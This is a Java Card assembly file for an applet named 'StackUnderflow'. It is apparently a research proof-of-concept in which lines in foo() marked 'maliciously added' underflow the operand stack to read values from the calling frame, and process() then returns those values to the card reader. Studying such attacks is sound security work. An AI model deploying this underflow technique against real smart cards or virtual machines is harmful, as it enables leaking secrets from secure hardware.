// converted by version 1.2
// on Thu Dec 12 01:22:28 CET 2019

.package com/stackunderflow {
	.aid 0xA0:0x0:0x0:0x0:0x0;
	.version 0.0;

	.imports {
		0xA0:0x0:0x0:0x0:0x62:0x1:0x1 1.0;		//javacard/framework
	}

	.applet {
		0xA0:0x0:0x0:0x0:0x0:0x7:0x1 StackUnderflow;
	}

	.constantPool {
		// 0
		instanceFieldRef short[] StackUnderflow/st;
		// 1
		classRef StackUnderflow;
		// 2
		staticMethodRef 0.3.0()V;		// javacard/framework/Applet.<init>()V
		// 3
		staticMethodRef StackUnderflow/<init>([BSB)V;
		// 4
		virtualMethodRef 0.3.1()V;		// javacard/framework/Applet.register()V
		// 5
		virtualMethodRef 0.10.1()[B;		// javacard/framework/APDU.getBuffer()[B
		// 6
		virtualMethodRef 0.3.3()Z;		// javacard/framework/Applet.selectingApplet()Z
		// 7
		staticMethodRef 0.7.1(S)V;		// javacard/framework/ISOException.throwIt(S)V
		// 8
		staticMethodRef 0.16.4([BS)S;		// javacard/framework/Util.getShort([BS)S
		// 9
		virtualMethodRef StackUnderflow/m1(SS)S;
		// 10
		staticMethodRef 0.16.6([BSS)S;		// javacard/framework/Util.setShort([BSS)S
		// 11
		virtualMethodRef 0.10.8(SS)V;		// javacard/framework/APDU.setOutgoingAndSend(SS)V
		// 12
		virtualMethodRef StackUnderflow/foo()V;
	}

	.class public StackUnderflow 0 extends 0.3 {		// extends javacard/framework/Applet

		.fields {
			 short[] st 0;		// [S
			protected static final byte CLA_APP = -96;		// B
			protected static final byte INS_READ = -80;		// B
		}

		.publicMethodTable 7 {
			equals(Ljava/lang/Object;)Z;
			register()V;
			register([BSB)V;
			selectingApplet()Z;
			deselect()V;
			getShareableInterfaceObject(Ljavacard/framework/AID;B)Ljavacard/framework/Shareable;;
			select()Z;
			process(Ljavacard/framework/APDU;)V;
			m1(SS)S;
			foo()V;
		}

		.packageMethodTable 0 {
		}

		.method public static install([BSB)V 0 {
			.stack 5;
			.locals 0;

				L0:	new 1;		// com/stackunderflow/StackUnderflow
					dup;
					aload_0;
					sload_1;
					sload_2;
					invokespecial 3;		// com/stackunderflow/StackUnderflow.<init>([BSB)V
					pop;
					return;
		}

		.method protected <init>([BSB)V 1 {
			.stack 5;
			.locals 0;

				L0:	aload_0;
					invokespecial 2;		// javacard/framework/Applet.<init>()V
					aload_0;
					sconst_4;
					newarray 12;
					dup;
					sconst_0;
					sconst_1;
					sastore;
					dup;
					sconst_1;
					sconst_2;
					sastore;
					dup;
					sconst_2;
					sconst_3;
					sastore;
					dup;
					sconst_3;
					sconst_4;
					sastore;
					putfield_a 0;		// reference com/stackunderflow/StackUnderflow.st
					aload_0;
					invokevirtual 4;		// javacard/framework/Applet.register()V
					return;
		}

		.method public process(Ljavacard/framework/APDU;)V 7 {
			.stack 4;
			.locals 4;

			.descriptor	Ljavacard/framework/APDU;	0.10;

				L0:	aload_1;
					invokevirtual 5;		// javacard/framework/APDU.getBuffer()[B
					astore_3;
					aload_0;
					invokevirtual 6;		// javacard/framework/Applet.selectingApplet()Z
					ifeq L2;
				L1:	return;
				L2:	aload_3;
					sconst_0;
					baload;
					bspush -96;
					if_scmpeq L4;
				L3:	sspush 28160;
					invokestatic 7;		// javacard/framework/ISOException.throwIt(S)V
				L4:	aload_3;
					sconst_1;
					baload;
					slookupswitch L9 1 -80 L5;
				L5:	aload_3;
					sconst_2;
					invokestatic 8;		// javacard/framework/Util.getShort([BS)S
					sstore_2;
					aload_0;
					sspush -12080;
					sspush 7967;
					invokevirtual 9;		// com/stackunderflow/StackUnderflow.m1(SS)S
					pop;
					sconst_0;
					sstore 4;
				L6:	sload 4;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					arraylength;
					if_scmpge L8;
				L7:	aload_3;
					sconst_2;
					sload 4;
					smul;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					sload 4;
					saload;
					invokestatic 10;		// javacard/framework/Util.setShort([BSS)S
					pop;
					sinc 4 1;
					goto L6;
				L8:	aload_1;
					sconst_0;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					arraylength;
					invokevirtual 11;		// javacard/framework/APDU.setOutgoingAndSend(SS)V
					goto L10;
				L9:	sspush 27904;
					invokestatic 7;		// javacard/framework/ISOException.throwIt(S)V
				L10:	return;
		}

		.method public m1(SS)S 8 {
			.stack 1;
			.locals 2;

				L0:	sspush 4369;
					sstore_3;
					sspush 4626;
					sstore 4;
					aload_0;
					invokevirtual 12;		// com/stackunderflow/StackUnderflow.foo()V
					sspush 5911;
					sreturn;
		}

		.method public foo()V 9 {
			.stack 3;
			.locals 4;

				L0:	sconst_0;
					sstore_1;
					sconst_0;
					sstore_2;
					sconst_0;
					sstore_3;
					sconst_0;
					sstore 4;
                                        dup2;                           // maliciously added next five lines
					sstore_1;
					sstore_2;
					sstore_3;
					sstore 4;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					sconst_0;
					sload_1;
					sastore;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					sconst_1;
					sload_2;
					sastore;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					sconst_2;
					sload_3;
					sastore;
					getfield_a_this 0;		// reference com/stackunderflow/StackUnderflow.st
					sconst_3;
					sload 4;
					sastore;
					return;
		}

	}

}
